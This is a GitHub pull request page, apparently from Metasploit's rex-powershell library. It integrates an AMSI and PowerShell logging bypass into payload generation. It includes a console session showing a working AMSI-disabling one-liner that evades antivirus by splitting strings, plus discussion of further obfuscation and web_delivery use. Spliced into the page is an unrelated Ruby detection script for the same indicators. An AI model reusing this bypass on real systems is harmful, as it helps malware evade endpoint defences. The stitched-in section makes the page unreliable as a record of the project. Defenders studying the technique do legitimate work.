Integrate PowerShell Protections Bypass #17

Merged
merged 5 commits into from
Apr 22, 2019


phra
Contributor

@phra phra commented Jan 19, 2019

@phra phra changed the title Integrate psh protections bypass Integrate PowerShell Protections Bypass Jan 19, 2019
@bwatters-r7
Contributor

@phra I missed this for a bit, but I'd like to test and land this. Can you give specific examples where our current payloads fail, but this succeeds so we can have some testing benchmarks?

@phra
Contributor Author

phra commented Feb 14, 2019

@bwatters-r7 just try any powershell payloads on an updated win 10 machine with AMSI.

phra and others added 4 commits February 18, 2019 00:35
Rex::Powershell has functionality to compose PowerShell code into
Script objects using basic lexical parsing to identify functions,
variables, etc. This functionality is intended to permit/leverage
composition by consumers for maximum entropy. Concurrently, script
modifiers are in place to clean up multiline blocks, replace names,
and perform other obfuscation.

Strip out the built-in uses of the new AMSI and log bypass methods.
Remove textual cleanup to allow Rex to handle this as needed.
Passing the :prepend_protections_bypass to cmd_psh_payload will
prepend the Ruby blocks for AMSI and log bypass to the payload
text. The subsequent compression and encoding passes will perform
the same textual substitution stripping out whitespace and may
also substitute the hardcoded variable names if requested.

This approach keeps string lengths predictable while permitting
use of the evasion functionality. Not so much an issue for a full
PSH payload, but can be handy when dealing with limited space
(HID attacks, manual retyping over GUIs, etc).
@phra
Contributor Author

phra commented Apr 15, 2019

as reference: https://iwantmore.pizza/posts/amsi.html

@timwr
Contributor

timwr commented Apr 16, 2019

Very interesting thanks @phra

@timwr
Contributor

timwr commented Apr 22, 2019

I didn't expect the '+' to work so well:

```
Microsoft Windows [Version 10.0.17134.523]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\User>powershell.exe
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\User>
>> $Ref=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');$Ref.GetField('amsiInitFailed','NonPublic,Stati
c').SetValue($null,$true);
>>
>>
>>
At line:1 char:1
+
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent

PS C:\Users\User> $Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils');$Ref.GetField('amsiIn'+'itFai
led','NonPublic,Static').SetValue($null,$true);
>>
>>
>>
PS C:\Users\User>
PS C:\Users\User>
```

@timwr timwr merged commit 2e14657 into rapid7:master Apr 22, 2019
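
The console session above shows a signature that matches the literal names and misses them once they are split with `+`. As an added example (not code from this PR or from rex-powershell), the Ruby below takes the defender's side: it folds adjacent string literals in logged script text before matching the two identifiers seen in that session. The function names and the sample lines are constructed for illustration.

```ruby
# Added example, not rex-powershell code: fold adjacent PowerShell string
# literals joined with '+' before matching indicators in logged script text.

# Identifiers taken from the console session on this page.
INDICATORS = %w[AmsiUtils amsiInitFailed].freeze

# A literal that needs no expansion: single-quoted, or double-quoted
# without '$' or backtick.
LITERAL = /'([^']*)'|"([^"$`]*)"/
CONCAT  = /(?:#{LITERAL.source})\s*\+\s*(?:#{LITERAL.source})/

# Repeatedly merge 'a'+'b' into 'ab' until nothing changes. The result is
# only for matching; it is not guaranteed to be valid PowerShell.
def fold_concatenations(text)
  folded = text.dup
  loop do
    break unless folded.gsub!(CONCAT) { "'#{$1 || $2}#{$3 || $4}'" }
  end
  folded
end

# Case-insensitive substring match against the indicator list.
def indicators_in(text)
  INDICATORS.select { |name| text.downcase.include?(name.downcase) }
end

# For each line, report hits on the raw text and on the folded text.
def scan(lines)
  lines.map do |line|
    { raw: indicators_in(line), folded: indicators_in(fold_concatenations(line)) }
  end
end

# Constructed sample lines (fragments in the style of script block log text).
SAMPLE = <<~'PS'.lines.map(&:chomp)
  [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
  [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils')
  $t.GetField("amsiIn" + 'itFai'+"led",'NonPublic,Static')
  Write-Output ('Hello, '+'world')
PS

if __FILE__ == $PROGRAM_NAME
  SAMPLE.zip(scan(SAMPLE)).each do |line, hit|
    puts format('raw=%-14s folded=%-18s %s', hit[:raw].inspect, hit[:folded].inspect, line)
  end
end
```

A line whose `raw` list is empty but whose `folded` list is not is itself worth flagging, since the name only appears after the pieces are joined.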
@timwr
Contributor

timwr commented Apr 22, 2019

Thanks @phra
We still need to add this to webdelivery (preferably as an off-by-default option).
It would be nice to have the strings obfuscated dynamically, but this will do for now.

@phra
Contributor Author

phra commented Apr 23, 2019

> I didn't expect the '+' to work so well:

[image]

> It would be nice to have the strings obfuscated dynamically, but this will do for now.

empire includes https://github.com/danielbohannon/Invoke-Obfuscation but depends on PowerShell and that means adding it as optional? dependency or embedding it directly within the project with a ~50mb overhead of stuff.

writing a simpler, similar project in ruby may be an overkill.

any idea?

@0xVIC

0xVIC commented Apr 23, 2019

@phra phra deleted the feat/psh-protections-bypass branch April 23, 2019 23:40
@phra
Contributor Author

phra commented May 1, 2019

was prepend_protections_bypass option defined somewhere?

i don't see the setting available yet with Framework Version: 5.0.19-dev.

@timwr
Contributor

timwr commented May 10, 2019

@phra apologies I didn't send a PR with that part, I think I tested with this commit: timwr/metasploit-framework@a0d6bcd

@phra
Contributor Author

phra commented May 10, 2019

oh ok, i hope it will be merged into master soon!
regarding the web delivery, it should be enough to prepend the bypass before the delivery script itself when choosing PowerShell as target.

@phra
Contributor Author

phra commented Jul 21, 2019

any update? i still cannot easily add the amsi bypass to powershell payloads.

@phra
Contributor Author

phra commented Oct 10, 2019

@timwr any update on this?

@timwr
Contributor

timwr commented Oct 11, 2019

@phra did you test the commit I posted above? timwr/metasploit-framework@a0d6bcd
maybe you can send a PR to the framework repository that enables it for web_delivery?

phra added a commit to phra/metasploit-framework that referenced this pull request Oct 12, 2019
phra added a commit to phra/metasploit-framework that referenced this pull request Oct 12, 2019
@phra
Contributor Author

phra commented Oct 12, 2019

> maybe you can send a PR to the framework repository that enables it for web_delivery?

@timwr see rapid7/metasploit-framework#12446

This pull request was closed.
Successfully merging this pull request may close these issues.

Integrate PowerShell Security Bypasses into web_delivery